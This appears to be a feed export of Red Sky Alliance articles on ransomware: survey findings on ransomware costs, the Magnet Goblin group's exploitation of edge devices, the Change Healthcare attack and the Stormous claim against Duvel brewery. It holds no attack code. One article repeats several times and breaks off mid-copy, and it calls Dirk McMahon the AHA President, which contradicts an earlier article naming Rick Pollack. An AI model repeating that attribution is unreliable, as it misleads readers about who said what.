ransomware - X-Industry - Red Sky Alliance2024-03-28T19:53:44Zhttps://redskyalliance.org/xindustry/feed/tag/ransomwareRansomware: The Actual Cost to Businesseshttps://redskyalliance.org/xindustry/ransomware-the-actual-cost-to-businesses2024-03-20T16:00:00.000Z2024-03-20T16:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12402807460,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12402807460,RESIZE_400x{{/staticFileLink}}" width="250" alt="12402807460?profile=RESIZE_400x" /></a>A leading cyber security firm, Cybereason[1], has announced the results of its third annual ransomware study, commissioned to better understand the true impact of ransomware on businesses. This global study reveals that ransomware attacks are becoming more frequent, effective, and sophisticated.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/100-50-1-100-ransomware-gangs-using-50-types-of-malware">https://redskyalliance.org/xindustry/100-50-1-100-ransomware-gangs-using-50-types-of-malware</a></p>
<p>The Report Ransomware: The True Cost to Business 2024 reveals that of the organizations who opted to pay a ransom in return for their encrypted systems, only 47% received their data and solutions back uncorrupted.<a href="#_ftn2">[2]</a></p>
<p>Key Findings:</p>
<ul>
<li>56 percent of organizations surveyed suffered more than one ransomware attack in the last 24 months.</li>
<li>It still ‘doesn’t pay to pay’ as almost 80 percent of organizations who paid the ransom were hit a second time.</li>
<li>82 percent were hit again within a year.</li>
<li>63 percent were asked to pay again</li>
</ul>
<p>These findings emphasize why it does not pay to pay ransomware attackers, and organizations should instead focus on detection and prevention tactics to end ransomware attacks before material damage occurs.</p>
<p>Cybereason Global Field CISO Greg Day says this year’s research shows that, while most businesses have a ransomware strategy, many are incomplete. “They’re either missing a documented plan or the right people to execute it. As a result, we see that many organizations are paying the ransom.... Likewise, while many have cyber insurance, too many don’t know if, or to what degree, it covers them for ransomware attacks. This is problematic on several levels. It’s no guarantee that attackers won’t sell your data on the black market, that you’ll even get your full files and systems back, or that you won’t be attacked again.”</p>
<p>Other Findings:</p>
<ul>
<li>Attackers are evolving, and the supply chain shows weakness. 56 percent did not detect a breach for 3-12 months, and 41 percent of the attackers got in via a supply chain partner.</li>
<li>Attacker demands increased at every stage; 78 percent were breached a second time, and 63 percent were asked to pay more.</li>
<li>The actual cost is a staggering 46 percent estimated total business losses of $1-10 million and 16 percent estimated total business losses of over $10 million. Not to mention the loss of revenue, brand damage, and layoffs that followed.</li>
<li>Businesses lack the right tools. Less than half said their enterprises are adequately prepared for the next attack. While 87 percent of organizations increased spending, only 41 percent feel they have the right people and plans to manage the next attack.</li>
</ul>
<p>Based on Cybereason's research and their unique threat protection capabilities, it seems clear that in the case of Ransom attacks, prevention is a whole lot better than remediation.</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. LinkedIn. com/company/64265941 </li>
</ul>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.cybereason.com">https://www.cybereason.com</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.cybersecurityintelligence.com/blog/ransomware-the-true-cost-to-business-7501.html">https://www.cybersecurityintelligence.com/blog/ransomware-the-true-cost-to-business-7501.html</a></p></div>Meet the Magnet Goblin Hacker Grouphttps://redskyalliance.org/xindustry/meet-the-magnet-goblin-hacker-group2024-03-18T16:00:00.000Z2024-03-18T16:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12401906097,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12401906097,RESIZE_180x180{{/staticFileLink}}" width="150" alt="12401906097?profile=RESIZE_180x180" /></a>Magnet Goblin, a financially motivated threat actor, is swiftly adopting one-day security vulnerabilities into its arsenal to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts. Threat actor group Magnet Goblin's hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, mainly targeting public-facing servers and edge devices. In some cases, the deployment of the exploits is within 1 day after a [proof-of-concept] is published, significantly increasing the threat level posed by this actor.</p>
<p> Attacks mounted by the adversary have leveraged unpatched Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ servers as an initial infection vector to gain unauthorized access. The group is said to be active since at least January 2022.</p>
<p>Successful exploitation is followed by deploying a cross-platform remote access trojan (RAT) dubbed Nerbian RAT, first disclosed by Proofpoint in May 2022, and its simplified variant called MiniNerbian. Darktrace previously highlighted the use of the Linux version of Nerbian RAT. Both strains allow for executing arbitrary commands received from a command-and-control (C2) server and exfiltrating the results back to it.</p>
<p>Some of Magnet Goblin's other tools include the WARPWIRE JavaScript credential stealer, the Go-based tunneling software known as Ligolo, and legitimate remote desktop offerings such as AnyDesk and ScreenConnect. Magnet Goblin, whose campaigns appear to be financially motivated, has quickly adopted 1-day vulnerabilities to deliver its custom Linux malware, Nerbian RAT and MiniNerbian. Those tools operate under the radar as they primarily reside on edge devices. This is part of an ongoing trend for threat actors to target unprotected areas.</p>
<p> </p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. LinkedIn. com/company/64265941 </li>
</ul>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p></div>Hospitals Seek Federal Helphttps://redskyalliance.org/xindustry/hospitals-seek-federal-help2024-03-14T12:00:00.000Z2024-03-14T12:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12399906295,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12399906295,RESIZE_400x{{/staticFileLink}}" width="250" alt="12399906295?profile=RESIZE_400x" /></a>The unprecedented cyberattack on Change Healthcare<a href="#_ftn1">[1]</a>, a major revenue cycle management firm, has thrown the US healthcare system into a financial mess. With payment systems crippled, hospitals are demanding federal intervention to avert an economic crisis that could imperil care delivery. Change Healthcare is a revenue and payment cycle management provider that connects payers, providers, and patients within the U.S. healthcare system. The name also refers to a company founded in 2007 that became part of the current conglomerate.<a href="#_ftn2">[2]</a></p>
<p>The American Hospital Association (AHA) has pressured Congress and the White House to take extraordinary measures supporting providers impacted by the ongoing disruptions at the UnitedHealth Group subsidiary. In a letter to leaders like Senate Majority Leader Chuck Schumer, the AHA warned the 13-day incident "demands a whole of government response."</p>
<p>"This attack has already imposed significant consequences on patients and the hospitals, health systems, and other providers who care for them," wrote AHA President Rick Pollack. He cited patients struggling to get care, billions in halted cash flows threatening provider viability, and skyrocketing administrative costs from laborious manual workarounds.</p>
<p>The AHA criticized UnitedHealth's temporary funding assistance program as "not even a band-aid (ha!) on the payment problems" and called for bold federal actions like expediting Medicare advance payments and compelling more support from the healthcare giant. The crisis has cybersecurity experts debating the merits of potential government intervention. "Federal agencies can play a pivotal role... offering support to the affected entities in a number of ways both in the short term and long term," said Darren Guccione, CEO of Keeper Security, outlining roles for the FBI, CISA, and NIST.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/cyber-attacks-on-hospitals">https://redskyalliance.org/xindustry/cyber-attacks-on-hospitals</a></p>
<p>Critical Start's Chad Graham cautioned that such intervention could create "a moral hazard, reducing the incentive for healthcare institutions to invest in robust cybersecurity measures." Yet he acknowledged it may be needed to "prevent potentially catastrophic disruptions in patient care."</p>
<p>Menlo Security's Ngoc Bui alleged the attack is linked to the prolific BlackCat ransomware gang, speculating they pulled an "exit scam" after getting paid to avoid law enforcement. As hospitals plead for a financial lifeline, experts agree the situation underscores the cyber vulnerability of healthcare's critical infrastructure and the need for a holistic strategy balancing immediate incident response and long-term resilience.</p>
<p>Jim McKee, CEO of Red Sky Alliance Corp., stated, “Hackers cannot be taught that a third party will pay all of their demands to solve the ransomware problem. This will only increase the number and price tags of never-ending cyberattacks. Organizations need to prioritize their budgets to defend against these attacks in the first place.”</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. LinkedIn. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.changehealthcare.com">https://www.changehealthcare.com</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.secureworld.io/industry-news/hospitals-seek-federal-help-ransomware/">https://www.secureworld.io/industry-news/hospitals-seek-federal-help-ransomware/</a></p></div>Stormous Gang - Stopped the Flowhttps://redskyalliance.org/xindustry/stormous-gang-stopped-the-flow2024-03-13T11:10:00.000Z2024-03-13T11:10:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12399696667,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12399696667,RESIZE_400x{{/staticFileLink}}" width="250" alt="12399696667?profile=RESIZE_400x" /></a>The Stormous ransomware gang has taken credit for an attack on a major Belgian beer producer this week. The ransomware attack on Duvel Moortgat Brewery has affected operations for days. Can you believe it? Who wants to stop the flow of beer? Local news outlets and BleepingComputer reported on Wednesday that Duvel’s IT department detected the attack and shut down production lines. Spokesperson Ellen Aerts told reporters that they are “still working to find out exactly what happened. "We have decided to switch off our servers and as a result production is at a standstill at all our Belgian sites and at our site in the United States,” she said. "We are confident that we will be able to restart production soon. In the meantime, there is enough stock, so Duvel drinkers don’t have to worry.”</p>
<p>The company was added to Stormous’ leak site on March 7<sup>th</sup> with the group claiming to have stolen 88 gigabytes of data from Duvel. The gang gave the brewer a deadline of March 25 to pay the ransom. The company did not respond to requests for comment about the situation.<a href="#_ftn1">[1]</a></p>
<p>The incident comes amid growing interest in Stormous ransomware following their announced alliance with GhostSec, a financially-motivated hacking group conducting single and double-extortion attacks that has ramped up its activity over the last year, according to Cisco Talos.</p>
<p>Researchers published a report this week about the alliance between the two groups, finding that they are “operating together to conduct… double extortion attacks” on victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkey, Egypt, Vietnam, Thailand and Indonesia.</p>
<p>GhostSec has also been active on its Telegram channel in highlighting its attacks on Israel’s Industrial systems, critical infrastructure and technology companies. In recent months the group has claimed to be part of an alliance called the “Five Families,” which includes the hacking groups ThreatSec, Stormous, Blackforums and SiegedSec. “Their claims also showed us that their primary focus is raising funds for hacktivists and threat actors through their cybercriminal activities,” Cisco researchers said.</p>
<p>GhostSec began to collaborate with the Stormous ransomware gang in July 2023 in several alleged attacks on government organizations in Cuba. By October, the two groups announced a partnership and GhostSec unveiled a new ransomware-as-a-service (RaaS) operation called GhostLocker. Since then, the groups have collaborated on several attacks while evolving their offerings to include methods for independent hackers to use their platform to simply sell or publish stolen data.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/stormous-claims-duvel-beer-attack/">https://therecord.media/stormous-claims-duvel-beer-attack/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
